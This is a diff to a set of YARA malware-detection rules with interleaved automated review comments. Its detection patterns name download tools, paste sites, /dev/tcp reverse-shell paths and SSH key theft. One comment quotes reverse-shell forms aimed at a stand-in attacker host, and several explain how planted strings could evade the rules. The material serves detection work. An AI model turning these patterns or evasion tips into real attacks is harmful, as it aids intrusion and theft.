@@ -50,7 +47,7 @@ rule http_url_with_question: medium { $ref = /https*:\/\/[\w\.\/]{8,160}\.[a-zA-Z]{2,3}\?[\w\=\&]{0,32}/ $not_cvs_sourceforge = /cvs.sourceforge.net.{0,64}\?rev=/ $not_rev_head = "?rev=HEAD" - $not_cgi = ".cgi?" + $not_cgi = ".cgi?" condition: filesize < 256KB and any of ($f*) and $ref and none of ($not*) @@ -61,7 +58,8 @@ rule binary_php_url_with_question: high { description = "contains hardcoded endpoint with a question mark" strings: - $ref = /https*:\/\/[\w\.\/]{8,160}\.php\?[\w\=\&]{0,32}/ + $ref = /https*:\/\/[\w\.\/]{8,160}\.php\?[\w\=\&]{0,32}/ + condition: filesize < 150MB and elf_or_macho and $ref } @@ -71,15 +69,16 @@ rule script_php_url_with_question: medium { description = "contains hardcoded endpoint with a question mark" strings: - $f_import = "import" fullword - $f_require = "require" fullword - $f_curl = "curl" fullword - $f_wget = "wget" fullword - $f_requests = "requests.get" fullword - $f_requests_post = "requests.post" fullword - $f_urllib = "urllib.request" fullword - $f_urlopen = "urlopen" fullword - $ref = /https*:\/\/[\w\.\/]{8,160}\.php\?[\w\=\&]{0,32}/ + $f_import = "import" fullword + $f_require = "require" fullword + $f_curl = "curl" fullword + $f_wget = "wget" fullword + $f_requests = "requests.get" fullword + $f_requests_post = "requests.post" fullword + $f_urllib = "urllib.request" fullword + $f_urlopen = "urlopen" fullword + $ref = /https*:\/\/[\w\.\/]{8,160}\.php\?[\w\=\&]{0,32}/ + condition: filesize < 256KB and any of ($f*) and $ref } diff --git a/rules/c2/server_address.yara b/rules/c2/server_address.yara deleted file mode 100644 index 2504fbc73..000000000 --- a/rules/c2/server_address.yara +++ /dev/null 
@@ -1,16 +0,0 @@ -rule server_address: medium { - meta: - description = "references a 'server address', possible C2 client" - hash_2024_Downloads_3105 = "31054fb826b57c362cc0f0dbc8af15b22c029c6b9abeeee9ba8d752f3ee17d7d" - hash_2023_Linux_Malware_Samples_450a = "450a7e35f13b57e15c8f4ce1fa23025a7c313931a394c40bd9f3325b981eb8a8" - hash_2023_Linux_Malware_Samples_458e = "458e3e66eff090bc5768779d5388336c8619a744f486962f5dfbf436a524ee04" - - strings: - $underscores = /\w{0,32}server_addr\w{0,32}/ - $mixed = /\w{0,32}serverAddr\w{0,32}/ - $url = "serverURL" fullword - $url2 = "serverUrl" fullword - - condition: - any of them -} diff --git a/rules/c2/tool_transfer/download.yara b/rules/c2/tool_transfer/download.yara index 3686d3042..a800bb59e 100644 --- a/rules/c2/tool_transfer/download.yara +++ b/rules/c2/tool_transfer/download.yara @@ -7,18 +7,19 @@ rule download_sites: high { hash_2024_2024_GitHub_Clipper_raw = "e9f89885876c1958bc6eede3373e4f3c4d76a5bc35a247fb7531b757798cb032" strings: - $d_privatebin = /[\w\.]+privatebin[\w\.]+/ - $d_pastecode_dot = /pastecode\.[\w\.]+/ + $d_privatebin = /[\w\.]+privatebin[\w\.]{1,4}\// + $d_pastecode_dot = /pastecode\.[\w\.]{2,16}/ + $d_paste_dot = /\/paste\.[\w\.]{2,3}\// $d_discord = "cdn.discordapp.com" $d_pastebinger = "paste.bingner.com" $d_transfer_sh = "transfer.sh" $d_rentry = "rentry.co" fullword - $d_pastebin = /pastebin\.[\w]{2,3}/ fullword + $d_pastebin = /pastebin\.[\w]{2,3}[\w\/]{0,16}/ fullword $d_penyacom = "penyacom" $d_controlc = "controlc.com" $d_anotepad = "anotepad.com" $d_privnote = "privnote.com" - $d_hushnote = "hushnote" + $d_hushnote = /hushnote[\.\w\/]{3,16}/ $not_mozilla = "download.mozilla.org" $not_google = "dl.google.com" $not_manual = "manually upload" diff --git a/rules/c2/tool_transfer/shell.yara b/rules/c2/tool_transfer/shell.yara index 802c8bbda..45b6c3ed1 100644 --- a/rules/c2/tool_transfer/shell.yara +++ b/rules/c2/tool_transfer/shell.yara 
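Review bot: `$d_pastebin = /pastebin\.[\w]{2,3}[\w\/]{0,16}/ fullword` in `download_sites` pairs a greedy variable-length tail with `fullword`, and it is not obvious that a URL whose path runs past 16 characters still matches once the boundary check is applied to the longest match; a fixture with a long `pastebin.com/raw/...` path would settle it either way. `$d_paste_dot = /\/paste\.[\w\.]{2,3}\//` requires a trailing slash, so a bare `paste.<tld>` host at the end of a string no longer matches — fine if intended, but worth a comment such as `// require a path separator to avoid matching prose`. The hunk ends inside the `strings` section, so the rule's condition is outside this view.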
@@ -168,7 +168,7 @@ rule possible_dropper: high { $cmd_rm = "rm" fullword $cmd_sleep = "sleep" fullword $cmd_echo = "echo" fullword - $chmod = "chmod" fullword + $chmod = "chmod" fullword condition: filesize < 1KB and any of ($http*) and $chmod and any of ($tool*) and any of ($cmd*) diff --git a/rules/credential/ssh/ssh.yara b/rules/credential/ssh/ssh.yara index 70f1b84fd..35321cf07 100644 --- a/rules/credential/ssh/ssh.yara +++ b/rules/credential/ssh/ssh.yara @@ -26,19 +26,19 @@ rule id_rsa: medium { filesize < 10MB and ssh_folder and $id_rsa } - rule id_rsa_not_ssh: high { meta: description = "non-SSH client accessing SSH private keys" strings: - $id_rsa = "id_rsa" fullword - $not_ssh_newkeys = "SSH_MSG" - $not_ssh_userauth = "SSH_USERAUTH" - $not_ssh_20 = "SSH-2.0" - $not_openssh = "OpenSSH" - $not_ssh2 = "SSH2" fullword - $not_SSH_AUTH_SOCK = "SSH_AUTH_SOCK" + $id_rsa = "id_rsa" fullword + $not_ssh_newkeys = "SSH_MSG" + $not_ssh_userauth = "SSH_USERAUTH" + $not_ssh_20 = "SSH-2.0" + $not_openssh = "OpenSSH" + $not_ssh2 = "SSH2" fullword + $not_SSH_AUTH_SOCK = "SSH_AUTH_SOCK" + condition: filesize < 10MB and ssh_folder and $id_rsa and none of ($not*) } diff --git a/rules/discover/process/name-get.yara b/rules/discover/process/name.yara similarity index 100% rename from rules/discover/process/name-get.yara rename to rules/discover/process/name.yara diff --git a/rules/discover/process/parent_pid-get.yara b/rules/discover/process/parent.yara similarity index 100% rename from rules/discover/process/parent_pid-get.yara rename to rules/discover/process/parent.yara diff --git a/rules/discover/system/dev_full.yara b/rules/discover/system/dev_full.yara new file mode 100644 index 000000000..5cf54b19a --- /dev/null +++ b/rules/discover/system/dev_full.yara @@ -0,0 +1,10 @@ +rule dev_full: medium linux { + meta: + description = "tests full disk behavior" + + strings: + $val = "/dev/full" fullword + + condition: + $val +} 
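Review bot: `rule dev_full: medium linux` fires on the bare token `/dev/full` with no filesize bound and no file-type gate, which is looser than the sibling rule added in this patch (`proc_multiple` requires `filesize < 2MB and int32(0) == 1179403647`). `/dev/full` is mostly referenced by test suites and ENOSPC-handling checks, so a standalone medium is likely to be noise; gate it with `filesize < 2MB and uint32(0) == 1179403647 and $val`, or lower it to low. The description `"tests full disk behavior"` should tell the analyst what they are looking at, e.g. `"references /dev/full (write always fails with ENOSPC)"`.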
diff --git a/rules/discover/system/proc.yara b/rules/discover/system/proc.yara new file mode 100644 index 000000000..b9c2e8ecf --- /dev/null +++ b/rules/discover/system/proc.yara @@ -0,0 +1,20 @@ +rule proc_multiple: high { + meta: + description = "accesses an unusual assortment of /proc files" + + strings: + $ref = /\/proc\/[%{$][\/\$\w\}]{0,12}/ + $stat = "/proc/stat" + $net_den = "/proc/net/dev" + $proc_exe = "/proc/%d/exe" + $proc_kernel_v = "/proc/sys/kernel/version" + $proc_kernel_osrelease = "/proc/sys/kernel/osrelease" + $proc_self_maps = "/proc/self/maps" + $proc_ngroups_max = "/proc/sys/kernel/ngroups_max" + $proc_rtsig_max = "/proc/sys/kernel/rtsig-max" + $proc_meminfo = "/proc/meminfo" + $proc_cpuinfo = "/proc/cpuinfo" + + condition: + filesize < 2MB and int32(0) == 1179403647 and 80 % of them +} diff --git a/rules/discover/system/system_network.yara b/rules/discover/system/system_network.yara index 9e7677b65..09410e974 100644 --- a/rules/discover/system/system_network.yara +++ b/rules/discover/system/system_network.yara @@ -49,13 +49,15 @@ private rule obfuscate { private rule exfil { strings: - $f_b64decode = "application/json" - $f_post = "requests.post" - $f_nsurl = "NSURLRequest" - $f_curl = /curl.{0,32}-X POST/ + $f_app_json = "application/json" + $f_post = "requests.post" + $f_nsurl = "NSURLRequest" + $f_curl = /curl.{0,32}-X POST/ + + $not_requests_utils = "requests.utils" condition: - filesize < 512KB and any of them + filesize < 512KB and any of ($f*) and none of ($not*) } rule sys_net_recon_exfil: high { @@ -63,8 +65,9 @@ rule sys_net_recon_exfil: high { description = "may exfiltrate collected system and network information" strings: - $not_curl = "CURLAUTH_ONLY" + $not_curl = "CURLAUTH_ONLY" + $not_cloudinit = "cloudinit" fullword condition: - sys_net_recon and (obfuscate or exfil) and none of ($not*) + sys_net_recon and obfuscate and exfil and none of ($not*) } 
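Review bot: The string set in `proc_multiple` overlaps heavily with the `/proc` paths glibc's own `sysconf()` and `pthread_getattr_np()` read (`ngroups_max`, `rtsig-max`, `/proc/meminfo`, `/proc/cpuinfo`, `/proc/self/maps`, `/proc/stat`), so a statically linked glibc program under 2MB may well reach `80 % of them` and trip this `high` rule; please test against a static glibc/busybox sample and, if it fires, require `$proc_exe` and `$net_den` explicitly rather than relying on the percentage alone. The ELF check uses `int32(0) == 1179403647` while the other rules touched in this patch (`var_log_syslog_elf`, `snapd`, `vmtools`) use `uint32(0)`; the value is positive so both work, but `uint32(0)` keeps them consistent. `$net_den` is also a typo for `$net_dev`.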
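Review bot: `$not_requests_utils = "requests.utils"` switches the whole private rule `exfil` off, so `sys_net_recon_exfil` can no longer fire on anything carrying that token — and bundled Python payloads (PyInstaller, zipapp) that embed the `requests` package carry it right next to their own `requests.post` calls. If the goal is to skip the `requests` library's own source, key the exclusion on something unique to it (for example the `"Requests HTTP Library"` docstring) or scope it with `filesize < 64KB`, rather than a module path any importer may reference. A one-line comment above `$not_requests_utils` naming the file that triggered it would help whoever next tightens this.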
diff --git a/rules/evasion/file/location/chdir-unusual.yara b/rules/evasion/file/location/chdir-unusual.yara index 78b3d4d44..ffacd7992 100644 --- a/rules/evasion/file/location/chdir-unusual.yara +++ b/rules/evasion/file/location/chdir-unusual.yara @@ -76,7 +76,8 @@ rule cd_var_subdir: high { $d_var_run = "cd /var/run" $d_var_tmp = "cd /var/tmp" - $not_var_log_packages = "cd /var/log/packages" + $not_var_log_packages = "cd /var/log/packages" + condition: any of ($d*) and none of ($not*) } @@ -105,7 +106,7 @@ rule unusual_cd_dev: high { hash_2023_rc1_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d" strings: - $d_dev = /cd \/dev[\w\/\.]{0,64}/ + $d_dev = /cd \/dev\/[\w\/\.]{1,64}/ $makedev = "MAKEDEV" condition: diff --git a/rules/evasion/file/location/x11-unix.yara b/rules/evasion/file/location/x11-unix.yara index dd36e841f..9145dc33a 100644 --- a/rules/evasion/file/location/x11-unix.yara +++ b/rules/evasion/file/location/x11-unix.yara @@ -20,7 +20,8 @@ rule X11: override { $X11_space = "/etc/X11/" $X11R6 = "X11R6/share" $XForwarding = "X11 forwarding" - $X = "/tmp/.X11-unix/X" fullword + $X = "/tmp/.X11-unix/X" fullword + condition: filesize < 10MB and any of them } diff --git a/rules/evasion/file/prefix/prefix.yara b/rules/evasion/file/prefix/prefix.yara index c16702d5a..a2b1df3e3 100644 --- a/rules/evasion/file/prefix/prefix.yara +++ b/rules/evasion/file/prefix/prefix.yara 
@@ -42,7 +42,7 @@ rule hidden_short_path: high { description = "hidden short path in a system directory" strings: - $crit = /[\w\/\.]{0,32}\/(tmp|usr\/\w{0,8}|bin|lib|LaunchAgents|lib64|var|etc|shm|mqueue|spool|log|Users|Movies|Music|WebServer|Applications|Shared|Library|System)\/\.\w[\w\-\.]{0,2}/ fullword + $crit = /[\w\/\.]{0,32}\/(usr\/\w{0,8}|bin|lib|LaunchAgents|lib64|var|etc|shm|mqueue|spool|log|Users|Movies|Music|WebServer|Applications|Shared|Library|System)\/\.\w[\w\-\.]{0,2}/ fullword $not_network_manager = "org.freedesktop.NetworkManager" $not_private = "/System/Library/PrivateFrameworks/" $not_X11 = "/tmp/.X11-unix" diff --git a/rules/evasion/file/prefix/tmp.yara b/rules/evasion/file/prefix/tmp.yara new file mode 100644 index 000000000..ef978adeb --- /dev/null +++ b/rules/evasion/file/prefix/tmp.yara @@ -0,0 +1,17 @@ +rule hidden_short_path: high { + meta: + description = "hidden short path in a temp directory" + + strings: + $crit = /[\w\/\.]{0,32}\/tmp\/\.\w[\w\-\.]{0,2}/ fullword + $not_network_manager = "org.freedesktop.NetworkManager" + $not_private = "/System/Library/PrivateFrameworks/" + $not_X11 = "/tmp/.X11-unix" + $not_XIM = "/tmp/.XIM-unix" + $not_cpp = "/tmp/.cpp.err" + $not_ice = "SESSION_MANAGER" fullword + $not_md = "/dev/.tmp.md.%d:%d:%d" + + condition: + $crit and none of ($not*) +} diff --git a/rules/evasion/hijack_execution/etc-ld.so.preload.yara b/rules/evasion/hijack_execution/etc-ld.so.preload.yara index 7f4ffe56a..5e3375b92 100644 --- a/rules/evasion/hijack_execution/etc-ld.so.preload.yara +++ b/rules/evasion/hijack_execution/etc-ld.so.preload.yara @@ -25,7 +25,8 @@ rule etc_ld_preload_not_ld: high linux { $not_env_hwcap = "LD_HWCAP_MASK" $not_env_audit = "LD_AUDIT" $not_cache = "ld.so.cache" - $not_man = "MAN_DISABLE_SECCOMP" + $not_man = "MAN_DISABLE_SECCOMP" + condition: $ref and none of ($not*) } diff --git a/rules/evasion/logging/dev_log.yara b/rules/evasion/logging/dev_log.yara new file mode 100644 index 000000000..db2901e44 
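Review bot: The new `rules/evasion/file/prefix/tmp.yara` defines `rule hidden_short_path: high` while `prefix.yara` (the hunk just above) keeps a rule with the same identifier; if the rule files are compiled into one YARA namespace this is a duplicated-identifier compile error, and the existing `hidden_short_path = "medium"` override in `rules/false_positives/linux_src.yara` (touched later in this patch) can no longer refer unambiguously to either rule. Rename it, e.g. `rule hidden_short_tmp_path: high`, and point any override that is meant to cover `/tmp` at the new name. The copied `$not_network_manager` and `$not_private` exclusions concern D-Bus names and `/System/Library`, not `/tmp`, and can be dropped here.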
--- /dev/null +++ b/rules/evasion/logging/dev_log.yara @@ -0,0 +1,10 @@ +rule full: medium linux { + meta: + description = "device where local syslog messages are read" + + strings: + $val = "/dev/log" fullword + + condition: + $val +} diff --git a/rules/evasion/logging/syslog.yara b/rules/evasion/logging/syslog.yara index 613ecc599..f2bb2e030 100644 --- a/rules/evasion/logging/syslog.yara +++ b/rules/evasion/logging/syslog.yara @@ -22,6 +22,7 @@ rule var_log_syslog_elf: high { $not_syslog_conf = "/etc/syslog.conf" $not_rsyslog_conf = "/etc/rsyslog.conf" $not_rsyslog = "RSYSLOG" fullword + $not_top = "~/.toprc" condition: filesize < 1MB and uint32(0) == 1179403647 and any of ($ref*) and none of ($not*) diff --git a/rules/evasion/mimicry/fake-library.yara b/rules/evasion/mimicry/fake-library.yara index 3da69deac..fe93f4c0b 100644 --- a/rules/evasion/mimicry/fake-library.yara +++ b/rules/evasion/mimicry/fake-library.yara @@ -33,8 +33,9 @@ rule libc_fake_number_val: high { hash_2023_uacert_refs = "106eef08f3bfcced3e221ee6f789792650386d7794d30c80eae19e42ef893682" strings: - $ref = /libc.so.[2345789]/ - $not_go_example = "libc.so.96.1" + $ref = /libc.so.[2345789]/ + $not_go_example = "libc.so.96.1" + condition: $ref and none of ($not*) } diff --git a/rules/evasion/net/http_443.yara b/rules/evasion/net/http_443.yara index a874c3047..7d4913ba9 100644 --- a/rules/evasion/net/http_443.yara +++ b/rules/evasion/net/http_443.yara @@ -7,7 +7,8 @@ rule http_port_443: high { $not_test = "assertEqual" $not_example = "http://example.com:443" $not_localhost = "http://localhost:443" - $not_foo = "http://foo.com:443/" + $not_foo = "http://foo.com:443/" + condition: $http_443 and none of ($not*) } diff --git a/rules/evasion/process_injection/ptrace.yara b/rules/evasion/process_injection/ptrace.yara index f9331847e..50ad34eec 100644 --- a/rules/evasion/process_injection/ptrace.yara +++ b/rules/evasion/process_injection/ptrace.yara 
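Review bot: The rule is named `full` (left over from `dev_full`) and matches the bare token `/dev/log`, which is the local syslog socket every program using `syslog()`/`openlog()` talks to — glibc's syslog implementation and every syslog client library embed that path — so a `medium` under `evasion/logging` with no size cap and no exclusions will fire on a large share of ordinary Linux binaries. Rename it (`rule dev_log: low linux`) and add a gate such as `filesize < 2MB and $val`; if the evasion of interest is a program that opens the socket directly instead of going through `syslog(3)`, a `$not_openlog = "openlog" fullword` exclusion would remove most of the noise. The description `"device where local syslog messages are read"` is also written from the daemon's side; clients write to `/dev/log`, so `"references the local syslog socket /dev/log"` is clearer.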
@@ -19,13 +19,28 @@ rule ptrace_injector: high { hash_2024_procinject_infect = "cb7c09e58c5314e0429ace2f0e1f3ebd0b802489273e4b8e7531ea41fa107973" strings: - $maps = /\/{0,1}proc\/[%{][%}\w]{0,1}\/maps/ - $ptrace = "ptrace" fullword - $proc = "process" fullword + $maps = /\/{0,1}proc\/[%{][%}\w]{0,1}\/maps/ + $ptrace = "ptrace" fullword + $proc = "process" fullword + + condition: + filesize < 67108864 and $maps and $ptrace and $proc +} + +rule known_ptrace_injectors: override { + meta: + description = "known" + ptrace_injector = "medium" + proc_d_exe_high = "medium" + + strings: $not_qemu = "QEMU_IS_ALIGNED" $not_chromium = "CHROMIUM_TIMESTAMP" $not_crashpad = "CRASHPAD" fullword + $not_perf = "PERF_SAMPLE" fullword + $not_trace = "TRACE_REQ" fullword + $not_bpf = "BPF" fullword condition: - filesize < 67108864 and $maps and $ptrace and $proc and none of ($not*) + any of them } diff --git a/rules/evasion/rootkit/linux_kernel.yara b/rules/evasion/rootkit/linux_kernel.yara index d870340b9..76fbdddd9 100644 --- a/rules/evasion/rootkit/linux_kernel.yara +++ b/rules/evasion/rootkit/linux_kernel.yara @@ -41,7 +41,8 @@ rule lkm_dirent: high { $linux = "Linux" $not_syscalls = "#define _LINUX_SYSCALLS_H" $not_itimer = "__kernel_old_itimerval" - $not_internal = "internal_getdents" + $not_internal = "internal_getdents" + condition: filesize < 2MB and all of ($l*) and none of ($not*) } diff --git a/rules/exec/shell/bash_dev_tcp.yara b/rules/exec/shell/bash_dev_tcp.yara index 7df0c2aeb..d0bc02be4 100644 --- a/rules/exec/shell/bash_dev_tcp.yara +++ b/rules/exec/shell/bash_dev_tcp.yara 
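Review bot: `known_ptrace_injectors: override` is mis-described — its strings (`QEMU_IS_ALIGNED`, `CHROMIUM_TIMESTAMP`, `CRASHPAD`, `PERF_SAMPLE`, `TRACE_REQ`, `BPF`) identify legitimate tracers, not injectors, so `description = "known"` should read something like `"known legitimate ptrace users (QEMU, Chromium, crashpad, perf, libbpf)"` and the rule could be named `ptrace_users_legit`. With `condition: any of them` and no size or ELF gate, the three-character token `BPF` anywhere in a file now downgrades both `ptrace_injector` and `proc_d_exe_high`; that token is trivially plantable and this repository's corpus already contains BPF-based backdoors (`tests/linux/2022.bpfdoor`), so please confirm those samples still report `ptrace_injector` at high and consider requiring `$not_bpf` together with `"libbpf"` or dropping it in favour of the `bpf` override in `rules/persist/kernel_module/symbol-lookup.yara`. Keeping the old `filesize < 67108864` bound on the override would at least mirror the rule it suppresses.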
@@ -1,16 +1,14 @@ rule bash_dev_tcp: high exfil { meta: - description = "uses /dev/tcp for network access (bash)" - hash_2023_UPX_0c25a05bdddc144fbf1ffa29372481b50ec6464592fdfb7dec95d9e1c6101d0d_elf_x86_64 = "818b80a08418f3bb4628edd4d766e4de138a58f409a89a5fdba527bab8808dd2" - hash_2023_usr_adxintrin_b = "a51a4ddcd092b102af94139252c898d7c1c48f322bae181bd99499a79c12c500" - hash_2023_spirit = "26ba215bcd5d8a9003a904b0eac7dc10054dba7bea9a708668a5f6106fd73ced" + description = "uses /dev/tcp for network access (bash)" strings: - $ref = "/dev/tcp" + $ref = /\/dev\/tcp[\/\w\.]{8,16}\/\d{1,6}/ $posixly_correct = "POSIXLY_CORRECT" $not_comment = "# Check that both our processes are running on their tcp port" $not_get = /GET \/ HTTP\/1.1\n{1,2} >/ $not_localhost_8080 = "/dev/tcp/127.0.0.1/8080" + $not_lsof = "/proc/tcp" fullword condition: $ref and not $posixly_correct and none of ($not*) diff --git a/rules/exec/shell/sighup_trap.yara b/rules/exec/shell/sighup_trap.yara index c2cc81895..235b5d272 100644 --- a/rules/exec/shell/sighup_trap.yara +++ b/rules/exec/shell/sighup_trap.yara @@ -6,9 +6,10 @@ rule trap_1: high { hash_2023_Linux_Malware_Samples_7a60 = "7a60c84fb34b2b3cd7eed3ecd6e4a0414f92136af656ed7d4460b8694f2357a7" strings: - $ref = "trap '' 1" - $ref2 = "trap \"\" 1" - $not_netcat_example = "ignore most signals; the parent will nuke the kid" + $ref = "trap '' 1" + $ref2 = "trap \"\" 1" + $not_netcat_example = "ignore most signals; the parent will nuke the kid" + condition: any of ($ref*) and none of ($not*) -} \ No newline at end of file +} diff --git a/rules/exfil/stealer/pam.yara b/rules/exfil/stealer/pam.yara index 4c7fa9238..1513b5e57 100644 --- a/rules/exfil/stealer/pam.yara +++ b/rules/exfil/stealer/pam.yara 
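Review bot: The tightened `$ref = /\/dev\/tcp[\/\w\.]{8,16}\/\d{1,6}/` misses the most common reverse-shell spellings: the host segment (including its leading `/`) is capped at 16 characters so `/dev/tcp/attacker.example.com/4444` fails, neither `$` nor `{}` is in the class so `/dev/tcp/$RHOST/$RPORT` and `/dev/tcp/${IP}/${PORT}` fail as well, and the port must be literal digits. Because the three sample hashes were removed in the same hunk, nothing in the tests pins those forms any more. Suggest `$ref = /\/dev\/tcp\/[\w\.\-\$\{\}]{1,64}\/[\w\$\{\}]{1,16}/` and restoring at least one hash so the intended coverage is exercised.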
@@ -14,14 +14,15 @@ rule pam_passwords: high { $f_orig_auth = "orig_pam_authenticate" $f_getifaddrs = "getifaddrs" fullword $f_keylogger = "keylogger" - $f_tmp = "/tmp/" + $f_tmp = /\/tmp\/[\.\w\-]{2,}/ $f_ssh = "/bin/ssh" + $f_sshpass = "sshpass" $f_sendto = "sendto" fullword $not_pam_service = "--pam-service" $not_pam_acct = "pam_acct_mgmt" condition: - $auth and $pass and 2 of ($f*) and none of ($not*) + $auth and $pass and 3 of ($f*) and none of ($not*) } rule pam_passwords_rootkit: critical { diff --git a/rules/false_positives/libdw.yara b/rules/false_positives/libdw.yara index 36b0ac115..17fc183d8 100644 --- a/rules/false_positives/libdw.yara +++ b/rules/false_positives/libdw.yara @@ -1,7 +1,8 @@ rule libdw_override: override { meta: - description = "libdw.so" - ptrace_injector = "medium" + description = "libdw.so" + ptrace_injector = "medium" + strings: $dward = "invalid DWARF" diff --git a/rules/false_positives/linux_src.yara b/rules/false_positives/linux_src.yara index e922ad6da..6bc14ce4c 100644 --- a/rules/false_positives/linux_src.yara +++ b/rules/false_positives/linux_src.yara @@ -7,7 +7,6 @@ rule linux_test_script: override linux { hidden_short_path = "medium" kernel_module_loader = "medium" cd_root = "medium" - server_address = "medium" description = "Linux test script" strings: diff --git a/rules/false_positives/slirp.yara b/rules/false_positives/slirp.yara index 50032a2e1..87550ab83 100644 --- a/rules/false_positives/slirp.yara +++ b/rules/false_positives/slirp.yara @@ -3,6 +3,7 @@ rule slirp4netns: override linux { description = "slirp4netns" login_records = "medium" linux_critical_system_paths_high = "medium" + fetch_tool = "medium" strings: $auth = "SLIRP_DEBUG" diff --git a/rules/false_positives/snapd.yara b/rules/false_positives/snapd.yara index 3ef08dc4b..ffc913462 100644 --- a/rules/false_positives/snapd.yara +++ b/rules/false_positives/snapd.yara 
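Review bot: The added `fetch_tool = "medium"` override in `slirp4netns` is a no-op — `rule fetch_tool` in `rules/net/download/fetch.yara` is already tagged `medium` in this same patch. The rule that would flag an ELF like slirp4netns at high is the renamed `binary_calls_fetch_tool` (formerly `executable_calls_fetch_tool`), so this line presumably should read `binary_calls_fetch_tool = "medium"`; otherwise drop it so the override list stays truthful.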
@@ -7,12 +7,15 @@ rule snapd: override linux { dev_mmc = "medium" busybox_runner = "medium" system_log_references = "medium" + hidden_x11 = "medium" filetypes = "elf,so" strings: $snapd_snapd = "SNAPD_SNAPD" $snapd = "snapcore/snapd" + $snapd_debug = "SNAPD_DEBUG" + $snap_name = "SNAP_NAME" fullword condition: - filesize > 15MB and filesize < 30MB and uint32(0) == 1179403647 and any of them + filesize > 1MB and filesize < 30MB and uint32(0) == 1179403647 and any of them } diff --git a/rules/false_positives/sudo.yara b/rules/false_positives/sudo.yara index f82b437a8..0fda2af79 100644 --- a/rules/false_positives/sudo.yara +++ b/rules/false_positives/sudo.yara @@ -1,10 +1,13 @@ rule sudo: override linux { meta: - description = "sudo" - proc_c_exe = "medium" + description = "sudo" + proc_c_exe = "medium" + small_elf_sudoer = "medium" + proc_d_exe_high = "medium" strings: - $ref = "SUDO_INTERCEPT_FD" + $ref = "SUDO_INTERCEPT_FD" + $ref2 = "SUDO_EDITOR" condition: any of them diff --git a/rules/false_positives/vmtools.yara b/rules/false_positives/vmtools.yara index d9525168e..2d5888698 100644 --- a/rules/false_positives/vmtools.yara +++ b/rules/false_positives/vmtools.yara @@ -3,12 +3,14 @@ rule vmtools: override { description = "vmtools" backdoor = "medium" linux_critical_system_paths_high = "medium" - proc_net_route_high = "medium" - proc_s_exe = "medium" - sys_net_recon_exfil = "medium" + proc_net_route_high = "medium" + proc_s_exe = "medium" + sys_net_recon_exfil = "medium" + strings: $vmtools = "VMTools" fullword $vmsupport = "VMSUPPORT" fullword + $vmware = "VMware" fullword condition: filesize < 1MB and uint32(0) == 1179403647 and any of them diff --git a/rules/fs/permission/permission-modify-dangerous.yara b/rules/fs/permission/permission-modify-dangerous.yara index e13faf533..5762cbc6a 100644 --- a/rules/fs/permission/permission-modify-dangerous.yara +++ b/rules/fs/permission/permission-modify-dangerous.yara 
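Review bot: `$snap_name = "SNAP_NAME" fullword` under `any of them`, combined with the floor lowered from 15MB to 1MB, means any 1–30MB ELF that merely reads the `SNAP_NAME` variable — which appears to be exported to every snap-confined process, not only to snapd — inherits this override and has `hidden_x11`, `dev_mmc`, `busybox_runner` and `system_log_references` silenced to medium. Keep the snapd-specific tokens as the trigger and make the weak ones supporting evidence: `condition: filesize > 1MB and filesize < 30MB and uint32(0) == 1179403647 and (any of ($snapd_snapd, $snapd) or 2 of them)`, or at minimum drop `$snap_name`. If a particular snapd build motivated the 1MB floor, a comment naming it would help the next person who tries to tighten this.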
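Review bot: `$ref2 = "SUDO_EDITOR"` with `condition: any of them` and no size or ELF gate turns this override into "any file that names the `SUDO_EDITOR` variable", a variable honoured by `visudo`-style and editor-wrapper tools beyond sudo itself; since the override now also silences `small_elf_sudoer` (from its name, small ELFs touching sudoers) and `proc_d_exe_high`, a small planted ELF could carry that string to drop itself to medium. Keep the sudo-internal `SUDO_INTERCEPT_FD` as the trigger, or require context for the weaker one: `condition: uint32(0) == 1179403647 and ($ref or ($ref2 and filesize > 100KB))`. A short comment per override key explaining why sudo legitimately hits `proc_d_exe_high` would make future pruning easier.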
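Review bot: `$vmware = "VMware" fullword` is a weak key for an override that silences `backdoor`, `linux_critical_system_paths_high`, `proc_net_route_high`, `proc_s_exe` and `sys_net_recon_exfil`: the token is embedded by anything that detects hypervisors (virt-what, dmidecode, systemd-detect-virt, guest agents), and anti-analysis malware that checks for a VMware sandbox routinely carries the same string, so a sub-1MB ELF with exactly the behaviours this override hides gets a free downgrade. `VMTools` and `VMSUPPORT` are the open-vm-tools-specific markers; drop `$vmware`, or require it together with one of them, e.g. `condition: filesize < 1MB and uint32(0) == 1179403647 and (any of ($vmtools, $vmsupport) or ($vmware and $vmsupport))`. If a specific open-vm-tools binary motivated the addition, name it in a comment and pick a string unique to it.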
@@ -22,7 +22,8 @@ rule chmod_dangerous_exec: high exfil { $not_chmod_01777 = "chmod 01777" $not_chromium = "CHROMIUM_TIMESTAMP" $not_var_tmp = "chmod 0777 /var/tmp" fullword - $not_extutils = "chmod 0777, [.foo.bar] doesn't work on VMS" + $not_extutils = "chmod 0777, [.foo.bar] doesn't work on VMS" + condition: filesize < 50MB and $ref and none of ($not*) } diff --git a/rules/fs/proc/arbitrary-pid.yara b/rules/fs/proc/arbitrary-pid.yara index 47419fd05..def32edf6 100644 --- a/rules/fs/proc/arbitrary-pid.yara +++ b/rules/fs/proc/arbitrary-pid.yara @@ -6,10 +6,10 @@ rule proc_arbitrary: medium { hash_2023_Downloads_98e7 = "98e7808bd5bfd72c08429ffe0ffb52ae54bce7e6389f17ae523e8ae0099489ab" strings: - $string_val = /\/proc\/[%{$][\/\$\w\}]{0,12}/ + $ref = /\/proc\/[%{$][\/\$\w\}]{0,12}/ condition: - any of them + $ref } rule pid_match: medium { diff --git a/rules/fs/proc/pid-exe.yara b/rules/fs/proc/pid-exe.yara index 6403f307e..6342a7595 100644 --- a/rules/fs/proc/pid-exe.yara +++ b/rules/fs/proc/pid-exe.yara @@ -3,8 +3,9 @@ rule proc_s_exe: high { description = "accesses underlying executable of other processes" strings: - $string = "/proc/%s/exe" fullword - $not_tool = /[Uu]sage:/ fullword + $string = "/proc/%s/exe" fullword + $not_tool = /[Uu]sage:/ fullword + condition: $string and none of ($not*) } 
